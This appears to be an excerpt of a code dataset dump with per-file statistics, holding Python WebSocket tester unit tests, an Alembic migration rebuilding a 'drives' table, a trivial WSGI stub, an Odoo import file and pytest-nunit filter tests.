self.assertTrue(ws_tester.is_complete())
mock_socket.send.assert_called_once_with('{"test": 123}')
mock_sleep.assert_not_called()
mock_socket.close.assert_called_once()
def test_with_request(self):
request = RestRequest('https://example.com', 'GET')
ws_tester = WSTest('wss://example.com').with_request(request)
self.assertEqual(1, len(ws_tester.requests))
self.assertEqual(request, ws_tester.requests[0])
self.assertFalse(ws_tester.is_complete())
@patch('websockets.connect')
@patch('requests.request')
@syncify
async def test_connect_with_rest_request(self, mock_requests, mock_websockets):
request = RestRequest('https://example.com', 'GET')
ws_tester = WSTest('ws://example.com').with_request(request)
mock_request_response = MagicMock()
mock_request_response.status_code = 'OK'
mock_request_response.json.return_value = {'abc': 123}
mock_requests.return_value = mock_request_response
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
await ws_tester.run()
mock_websockets.assert_called_once_with('ws://example.com')
mock_socket.close.assert_called_once()
mock_requests.assert_called_once_with('get', 'https://example.com', timeout=10.0)
self.assertEqual(1, len(ws_tester.received_request_responses))
self.assertEqual(mock_request_response, ws_tester.received_request_responses[0])
self.assertTrue(ws_tester.is_complete())
@patch('asyncio.sleep')
@patch('websockets.connect')
@patch('requests.request')
@syncify
async def test_connect_with_rest_request_with_delay(self, mock_requests, mock_websockets, mock_sleep):
request = RestRequest('https://example.com', 'GET').with_delay(3.0)
ws_tester = WSTest('ws://example.com').with_request(request)
mock_request_response = MagicMock()
mock_request_response.status_code = 'OK'
mock_request_response.json.return_value = {'abc': 123}
mock_requests.return_value = mock_request_response
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
mock_sleep.return_value = asyncio.Future()
mock_sleep.return_value.set_result(None)
await ws_tester.run()
mock_websockets.assert_called_once_with('ws://example.com')
mock_socket.close.assert_called_once()
mock_requests.assert_called_once_with('get', 'https://example.com', timeout=10.0)
mock_sleep.assert_called_once_with(3.0)
self.assertTrue(ws_tester.is_complete())
@patch('websockets.connect')
@patch('requests.request')
@syncify
async def test_connect_with_rest_request_with_timeout(self, mock_requests, mock_websockets):
request = RestRequest('https://example.com', 'GET')
ws_tester = WSTest('ws://example.com').with_request_timeout(0.1).with_request(request)
mock_requests.side_effect = ConnectTimeout('test error')
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
self.assertEqual(ws_tester.request_timeout, 0.1)
with self.assertRaises(WSTimeoutError):
await ws_tester.run()
mock_socket.close.assert_called_once()
| 35.186667 | 119 | 0.663054 | 2,997 | 26,390 | 5.50684 | 0.05005 | 0.083616 | 0.059985 | 0.074164 | 0.900267 | 0.872273 | 0.853672 | 0.842523 | 0.831677 | 0.819195 | 0 | 0.005985 | 0.227586 | 26,390 | 749 | 120 | 35.233645 | 0.80367 | 0.002653 | 0 | 0.742958 | 0 | 0 | 0.077706 | 0.005206 | 0 | 0 | 0 | 0 | 0.142606 | 1 | 0.012324 | false | 0 | 0.010563 | 0 | 0.028169 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d2974d7f29e54b05e1d0513f55f1ac1baa087f77 | 58 | py | Python | test/config/wsgi.py | jrroman/wsgi-hot-reload-daemon | 42bf9c03f9d55b649e0407841445e15375f87848 | [
"MIT"
] | 2 | 2020-06-12T18:23:39.000Z | 2020-08-25T19:46:28.000Z | test/config/wsgi.py | jrroman/wsgi-hot-reload-daemon | 42bf9c03f9d55b649e0407841445e15375f87848 | [
"MIT"
] | 1 | 2018-09-17T14:56:29.000Z | 2018-09-17T14:56:29.000Z | test/config/wsgi.py | jrroman/wsgi-hot-reload-daemon | 42bf9c03f9d55b649e0407841445e15375f87848 | [
"MIT"
] | null | null | null | import testing
def test_func():
return "hello world"
| 11.6 | 24 | 0.706897 | 8 | 58 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.206897 | 58 | 4 | 25 | 14.5 | 0.869565 | 0 | 0 | 0 | 0 | 0 | 0.189655 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
d2bf40751457eb6bc3c59ae37c6498d4d4099386 | 88 | py | Python | addons14/storage_media/models/__init__.py | odoochain/addons_oca | 55d456d798aebe16e49b4a6070765f206a8885ca | [
"MIT"
] | 1 | 2021-06-10T14:59:13.000Z | 2021-06-10T14:59:13.000Z | addons14/storage_media/models/__init__.py | odoochain/addons_oca | 55d456d798aebe16e49b4a6070765f206a8885ca | [
"MIT"
] | null | null | null | addons14/storage_media/models/__init__.py | odoochain/addons_oca | 55d456d798aebe16e49b4a6070765f206a8885ca | [
"MIT"
] | 1 | 2021-04-09T09:44:44.000Z | 2021-04-09T09:44:44.000Z | from . import storage_file
from . import storage_media
from . import storage_media_type
| 22 | 32 | 0.829545 | 13 | 88 | 5.307692 | 0.461538 | 0.434783 | 0.73913 | 0.637681 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.136364 | 88 | 3 | 33 | 29.333333 | 0.907895 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
96072e88ce10504690b78dc86056bdf56bf98e3c | 9,926 | py | Python | api/migrations/versions/00382c81d58e_.py | antcasq/machinaris | 95741d0cd78fee9605d7b47dcd08fa4f31b31f38 | [
"Apache-2.0"
] | null | null | null | api/migrations/versions/00382c81d58e_.py | antcasq/machinaris | 95741d0cd78fee9605d7b47dcd08fa4f31b31f38 | [
"Apache-2.0"
] | null | null | null | api/migrations/versions/00382c81d58e_.py | antcasq/machinaris | 95741d0cd78fee9605d7b47dcd08fa4f31b31f38 | [
"Apache-2.0"
] | null | null | null | """empty message
Revision ID: 00382c81d58e
Revises: e5c6d9a6d9c3
Create Date: 2022-03-25 21:58:49.980357
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '00382c81d58e'
down_revision = 'e5c6d9a6d9c3'
branch_labels = None
depends_on = None
def upgrade(engine_name):
globals()["upgrade_%s" % engine_name]()
def downgrade(engine_name):
globals()["downgrade_%s" % engine_name]()
def upgrade_():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_alerts():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_alerts():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_blockchains():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_blockchains():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_challenges():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_challenges():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_connections():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_connections():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_drives():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('drives')
op.create_table('drives',
sa.Column('device', sa.String(), nullable=False),
sa.Column('hostname', sa.String(length=255), nullable=False),
sa.Column('blockchain', sa.String(length=64), nullable=False),
sa.Column('model_family', sa.String(), nullable=True),
sa.Column('device_model', sa.String(), nullable=True),
sa.Column('serial_number', sa.String(), nullable=True),
sa.Column('status', sa.String(), nullable=True),
sa.Column('type', sa.String(), nullable=True),
sa.Column('comment', sa.String(), nullable=True),
sa.Column('temperature', sa.REAL(), nullable=True),
sa.Column('power_on_hours', sa.REAL(), nullable=True),
sa.Column('size_gibs', sa.REAL(), nullable=True),
sa.Column('capacity', sa.String(), nullable=True),
sa.Column('smart_info', sa.String(), nullable=True),
sa.Column('created_at', sa.DateTime(), server_default=sa.text('(CURRENT_TIMESTAMP)'), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.PrimaryKeyConstraint('device', 'hostname')
)
# ### end Alembic commands ###
def downgrade_drives():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('drives')
op.create_table('drives',
sa.Column('serial_number', sa.String(), nullable=False),
sa.Column('hostname', sa.String(length=255), nullable=False),
sa.Column('blockchain', sa.String(length=64), nullable=False),
sa.Column('model_family', sa.String(), nullable=True),
sa.Column('device_model', sa.String(), nullable=True),
sa.Column('device', sa.String(), nullable=True),
sa.Column('status', sa.String(), nullable=True),
sa.Column('type', sa.String(), nullable=True),
sa.Column('comment', sa.String(), nullable=True),
sa.Column('temperature', sa.REAL(), nullable=True),
sa.Column('power_on_hours', sa.REAL(), nullable=True),
sa.Column('size_gibs', sa.REAL(), nullable=True),
sa.Column('capacity', sa.String(), nullable=True),
sa.Column('smart_info', sa.String(), nullable=True),
sa.Column('created_at', sa.DateTime(), server_default=sa.text('(CURRENT_TIMESTAMP)'), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.PrimaryKeyConstraint('serial_number')
)
# ### end Alembic commands ###
def upgrade_farms():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_farms():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_keys():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_keys():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_partials():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_partials():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_plotnfts():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_plotnfts():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_plottings():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_plottings():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_plots():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_plots():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_pools():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_pools():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_wallets():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_wallets():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_workers():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_workers():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_stat_plot_count():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_stat_plot_count():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_stat_plots_size():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_stat_plots_size():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_stat_total_coins():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_stat_total_coins():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_stat_netspace_size():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_stat_netspace_size():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_stat_time_to_win():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_stat_time_to_win():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_stat_plots_total_used():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_stat_plots_total_used():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_stat_plots_disk_used():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_stat_plots_disk_used():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_stat_plots_disk_free():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_stat_plots_disk_free():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_stat_plotting_total_used():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_stat_plotting_total_used():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_stat_plotting_disk_used():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_stat_plotting_disk_used():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_stat_plotting_disk_free():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_stat_plotting_disk_free():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
| 26.189974 | 105 | 0.640036 | 1,126 | 9,926 | 5.512433 | 0.098579 | 0.076849 | 0.17593 | 0.192686 | 0.942484 | 0.93314 | 0.932173 | 0.92734 | 0.92734 | 0.92734 | 0 | 0.00766 | 0.21086 | 9,926 | 378 | 106 | 26.259259 | 0.784757 | 0.41759 | 0 | 0.539474 | 0 | 0 | 0.086258 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.355263 | false | 0.328947 | 0.013158 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
960c128d9cb429c5316257b1a16cb821255a4f1f | 7,159 | py | Python | tests/integration/test_filters.py | dciborow/pytest-nunit | 1d76c08b807332f12f93d156f297d856aff71157 | [
"MIT"
] | 1 | 2022-03-22T15:02:31.000Z | 2022-03-22T15:02:31.000Z | tests/integration/test_filters.py | dciborow/pytest-nunit | 1d76c08b807332f12f93d156f297d856aff71157 | [
"MIT"
] | null | null | null | tests/integration/test_filters.py | dciborow/pytest-nunit | 1d76c08b807332f12f93d156f297d856aff71157 | [
"MIT"
] | null | null | null | """
Test adding properties to tests
"""
import xmlschema
import os
def test_keyword_filter(testdir, tmpdir):
testdir.makepyfile(
"""
def test_basic(record_nunit_property):
assert 1 == 1
"""
)
outfile = tmpdir.join("out.xml")
outfile_pth = str(outfile)
result = testdir.runpytest("-v", "--nunit-xml=" + outfile_pth, "-k basic")
result.stdout.fnmatch_lines(["*test_basic PASSED*"])
assert result.ret == 0
os.path.exists(outfile_pth)
xs = xmlschema.XMLSchema(
os.path.join(
os.path.abspath(os.path.dirname(__file__)),
"../../ext/nunit-src/TestResult.xsd",
),
validation="lax",
)
out = xs.to_dict(outfile_pth)
assert out["@total"] == 1, out
assert out["@passed"] == 1, out
assert out["@failed"] == 0, out
assert out["@skipped"] == 0, out
assert out["test-suite"]["@total"] == 1
assert out["test-suite"]["@passed"] == 1
assert out["test-suite"]["@failed"] == 0
assert out["test-suite"]["@skipped"] == 0
assert "filter" in out
assert out["filter"]["name"][0]["$"] == "basic"
assert out["filter"]["name"][0]["@re"] == 0
def test_keyword_filter_complex(testdir, tmpdir):
testdir.makepyfile(
"""
def test_basic(record_nunit_property):
assert 1 == 1
"""
)
outfile = tmpdir.join("out.xml")
outfile_pth = str(outfile)
result = testdir.runpytest("-v", "--nunit-xml=" + outfile_pth, '-k "test or basic"')
result.stdout.fnmatch_lines(["*test_basic PASSED*"])
assert result.ret == 0
os.path.exists(outfile_pth)
xs = xmlschema.XMLSchema(
os.path.join(
os.path.abspath(os.path.dirname(__file__)),
"../../ext/nunit-src/TestResult.xsd",
),
validation="lax",
)
out = xs.to_dict(outfile_pth)
assert out["@total"] == 1, out
assert out["@passed"] == 1, out
assert out["@failed"] == 0, out
assert out["@skipped"] == 0, out
assert out["test-suite"]["@total"] == 1
assert out["test-suite"]["@passed"] == 1
assert out["test-suite"]["@failed"] == 0
assert out["test-suite"]["@skipped"] == 0
assert "filter" in out
assert out["filter"]["name"][0]["$"] == '"test or basic"'
assert out["filter"]["name"][0]["@re"] == 0
def test_marker_filter(testdir, tmpdir):
testdir.makepyfile(
"""
import pytest
@pytest.mark.foo
def test_basic(record_nunit_property):
assert 1 == 1
"""
)
outfile = tmpdir.join("out.xml")
outfile_pth = str(outfile)
result = testdir.runpytest("-v", "--nunit-xml=" + outfile_pth, "-m foo")
result.stdout.fnmatch_lines(["*test_basic PASSED*"])
assert result.ret == 0
os.path.exists(outfile_pth)
xs = xmlschema.XMLSchema(
os.path.join(
os.path.abspath(os.path.dirname(__file__)),
"../../ext/nunit-src/TestResult.xsd",
),
validation="lax",
)
out = xs.to_dict(outfile_pth)
assert out["@total"] == 1, out
assert out["@passed"] == 1, out
assert out["@failed"] == 0, out
assert out["@skipped"] == 0, out
assert out["test-suite"]["@total"] == 1
assert out["test-suite"]["@passed"] == 1
assert out["test-suite"]["@failed"] == 0
assert out["test-suite"]["@skipped"] == 0
assert "filter" in out
assert out["filter"]["namespace"][0]["$"] == "foo"
assert out["filter"]["namespace"][0]["@re"] == 0
def test_marker_filter_complex(testdir, tmpdir):
testdir.makepyfile(
"""
import pytest
@pytest.mark.baz
@pytest.mark.foo
def test_basic(record_nunit_property):
assert 1 == 1
"""
)
outfile = tmpdir.join("out.xml")
outfile_pth = str(outfile)
result = testdir.runpytest("-v", "--nunit-xml=" + outfile_pth, '-m "foo or baz"')
result.stdout.fnmatch_lines(["*test_basic PASSED*"])
assert result.ret == 0
os.path.exists(outfile_pth)
xs = xmlschema.XMLSchema(
os.path.join(
os.path.abspath(os.path.dirname(__file__)),
"../../ext/nunit-src/TestResult.xsd",
),
validation="lax",
)
out = xs.to_dict(outfile_pth)
assert out["@total"] == 1, out
assert out["@passed"] == 1, out
assert out["@failed"] == 0, out
assert out["@skipped"] == 0, out
assert out["test-suite"]["@total"] == 1
assert out["test-suite"]["@passed"] == 1
assert out["test-suite"]["@failed"] == 0
assert out["test-suite"]["@skipped"] == 0
assert "filter" in out
assert out["filter"]["namespace"][0]["$"] == '"foo or baz"'
assert out["filter"]["namespace"][0]["@re"] == 0
def test_path_filter(testdir, tmpdir):
testdir.makepyfile(
"""
def test_basic(record_nunit_property):
assert 1 == 1
"""
)
outfile = tmpdir.join("out.xml")
outfile_pth = str(outfile)
result = testdir.runpytest(
"-v", "--nunit-xml=" + outfile_pth, "test_path_filter.py"
)
result.stdout.fnmatch_lines(["*test_basic PASSED*"])
assert result.ret == 0
os.path.exists(outfile_pth)
xs = xmlschema.XMLSchema(
os.path.join(
os.path.abspath(os.path.dirname(__file__)),
"../../ext/nunit-src/TestResult.xsd",
),
validation="lax",
)
out = xs.to_dict(outfile_pth)
assert out["@total"] == 1, out
assert out["@passed"] == 1, out
assert out["@failed"] == 0, out
assert out["@skipped"] == 0, out
assert out["test-suite"]["@total"] == 1
assert out["test-suite"]["@passed"] == 1
assert out["test-suite"]["@failed"] == 0
assert out["test-suite"]["@skipped"] == 0
assert "filter" in out
assert out["filter"]["test"][0]["$"] == "test_path_filter.py"
assert out["filter"]["test"][0]["@re"] == 0
def test_path_filter_complex(testdir, tmpdir):
testdir.makepyfile(
"""
def test_basic(record_nunit_property):
assert 1 == 1
"""
)
outfile = tmpdir.join("out.xml")
outfile_pth = str(outfile)
result = testdir.runpytest(
"-v", "--nunit-xml=" + outfile_pth, "test_path_filter_complex.py", "."
)
result.stdout.fnmatch_lines(["*test_basic PASSED*"])
assert result.ret == 0
os.path.exists(outfile_pth)
xs = xmlschema.XMLSchema(
os.path.join(
os.path.abspath(os.path.dirname(__file__)),
"../../ext/nunit-src/TestResult.xsd",
),
validation="lax",
)
out = xs.to_dict(outfile_pth)
assert out["@total"] == 1, out
assert out["@passed"] == 1, out
assert out["@failed"] == 0, out
assert out["@skipped"] == 0, out
assert out["test-suite"]["@total"] == 1
assert out["test-suite"]["@passed"] == 1
assert out["test-suite"]["@failed"] == 0
assert out["test-suite"]["@skipped"] == 0
assert "filter" in out
assert out["filter"]["test"][0]["$"] == "test_path_filter_complex.py"
assert out["filter"]["test"][0]["@re"] == 0
assert out["filter"]["test"][1]["$"] == "."
assert out["filter"]["test"][1]["@re"] == 0
| 30.206751 | 88 | 0.566839 | 891 | 7,159 | 4.432099 | 0.074074 | 0.141302 | 0.091162 | 0.109395 | 0.97493 | 0.961256 | 0.959483 | 0.949608 | 0.913143 | 0.895417 | 0 | 0.015963 | 0.23872 | 7,159 | 236 | 89 | 30.334746 | 0.708624 | 0.00433 | 0 | 0.795455 | 0 | 0 | 0.221401 | 0.039723 | 0 | 0 | 0 | 0 | 0.420455 | 1 | 0.034091 | false | 0.102273 | 0.011364 | 0 | 0.045455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.